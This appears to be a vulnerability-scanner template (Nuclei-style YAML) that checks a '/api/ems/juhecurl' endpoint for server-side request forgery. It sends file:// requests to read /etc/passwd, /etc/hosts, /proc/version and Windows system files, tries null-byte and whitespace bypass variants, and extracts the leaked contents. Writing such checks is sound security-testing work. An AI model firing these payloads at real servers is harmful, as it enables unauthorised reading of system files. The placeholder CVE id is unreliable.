id: juhecurl-ssrf-file-read

info:
  name: JuheCurl SSRF File Read Vulnerability
  author: 如烟
  severity: high
  description: |
    The /api/ems/juhecurl endpoint is vulnerable to SSRF attacks, allowing attackers to read arbitrary files from the server.
    This vulnerability can be exploited to read sensitive files like /etc/passwd.
  reference:
    - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Server_Side_Request_Forgery
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-XXXX
    cwe-id: CWE-918
  tags: ssrf,file-read,juhecurl,high

variables:
  filename: "{{rand_base(6)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/ems/juhecurl?url=file:///etc/passwd"
      - "{{BaseURL}}/api/ems/juhecurl?url=file:///etc/hosts"
      - "{{BaseURL}}/api/ems/juhecurl?url=file:///proc/version"

    headers:
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
      Accept: "*/*"
      Accept-Charset: utf-8

    matchers:
      - type: word
        words:
          - "root:x:0:0"
          - "bin:x:1:1"
          - "daemon:x:2:2"
        condition: or
        
      - type: word
        words:
          - "127.0.0.1"
          - "localhost"
        condition: or
        
      - type: word
        words:
          - "Linux version"
          - "GNU"
        condition: or

    extractors:
      - type: regex
        regex:
          - 'root:x:0:0:root:[^:]*:[^:]*'
          - 'bin:x:1:1:bin:[^:]*:[^:]*'
          - 'daemon:x:2:2:daemon:[^:]*:[^:]*'

  # Additional test for Windows environments
  - method: GET
    path:
      - "{{BaseURL}}/api/ems/juhecurl?url=file:///c:/windows/win.ini"
      - "{{BaseURL}}/api/ems/juhecurl?url=file:///c:/boot.ini"

    headers:
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
      Accept: "*/*"
      Accept-Charset: utf-8

    matchers:
      - type: word
        words:
          - "[fonts]"
          - "[extensions]"
          - "[files]"
        condition: or

    extractors:
      - type: regex
        regex:
          - '\[fonts\]'
          - '\[extensions\]'
          - '\[files\]'

  # Test for protocol validation bypass
  - method: GET
    path:
      - "{{BaseURL}}/api/ems/juhecurl?url=file:///etc/passwd%00"
      - "{{BaseURL}}/api/ems/juhecurl?url=file:///etc/passwd%20"
      - "{{BaseURL}}/api/ems/juhecurl?url=file:///etc/passwd%09"

    headers:
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
      Accept: "*/*"
      Accept-Charset: utf-8

    matchers:
      - type: word
        words:
          - "root:x:0:0"
        condition: and